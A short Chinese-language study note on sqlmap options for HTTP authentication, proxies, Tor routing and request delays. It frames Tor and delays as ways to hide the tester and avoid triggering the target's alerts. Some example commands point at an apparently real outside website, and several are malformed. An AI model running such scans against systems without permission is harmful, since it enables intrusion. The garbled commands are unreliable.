22.05.23.05
- 1、Sqlmap设置HTTP协议认证
- Sqlmap中设置HTTP协议认证的参数 : –auth-type 和 –auth-cred
- 其中 --auth-type支持 Basic、Digest、NTLM
- –auth-cred 认证语法为 : username:password
- 例如 : python sqlmap.py -u “http://url/arit.php?id=1” --auth-type Basic --auth-cred “testuser:testpass”
- 2、Sqlmap设置HTTP代理
- Sqlmap中设置代理的参数 : –proxy, --proxy-cred, --proxy-file, --ignore-proxy
- 其中 --proxy用来设置HTTP代理服务器位置 格式 : –proxy http(s)😕/ip[:端口]
- –proxy-cred 用来设置HTTP代理服务器认证信息 格式 : –proxy-cred username:password
- –proxy-file用来设置多条代理在文件中
- –ignore-proxy 当您希望通过忽略系统范围内的HTTP(S)代理服务器设置来针对本地网络的目标部分运行 sqlmap 时, 应该使用这种方法
- 3、Sqlmap设置Tor隐藏网络
- Sqlmap中设置Tor网络的参数 : –tor, --tor-port, --tor-type --check-tor
- sqlmap -u " " --tor --tor -type=SOCKs5 --check -tor http://www.asp.com.cn/index.php?m=search&c=index&a=init&typeid=53&siteid=1&q=XP19
- apt install tor
- service tor start
- service tor status
- sqlmap -u " " --tor --tor -type http://www.asp.com.cn/index.php?m=search&c=index&a=init&typeid=53&siteid=1&q=XP19
- sqlmap -u " " --tor --tor -type http --check-tor http://www.asp.com.cn/index.php?m=search&c=index&a=init&typeid=53&siteid=1&q=XP19
- 4、Sqlmap设置延迟
- Sqlmap 探测过程中会发送大量探测Payload到目标 , 如果默认情况过快的发包速度回导致目标预警。 为了避免这样的情况发生, 可以在探测设置Sqlmap发包延迟。默认情况下, 不设置延迟。
- –delay 0.5 设置延迟0.5秒
- sqlmap -u " " --tor --tor-type https --check-tor http://www.asp.com.cn/index.php?m=search&c=index&a=init&typeid=53&siteid=53&siteid=1&q=XP19
- sqlmap -u " " --delay 0.5 --banner http://192.168.1.100/sqli/Less-1/?id=1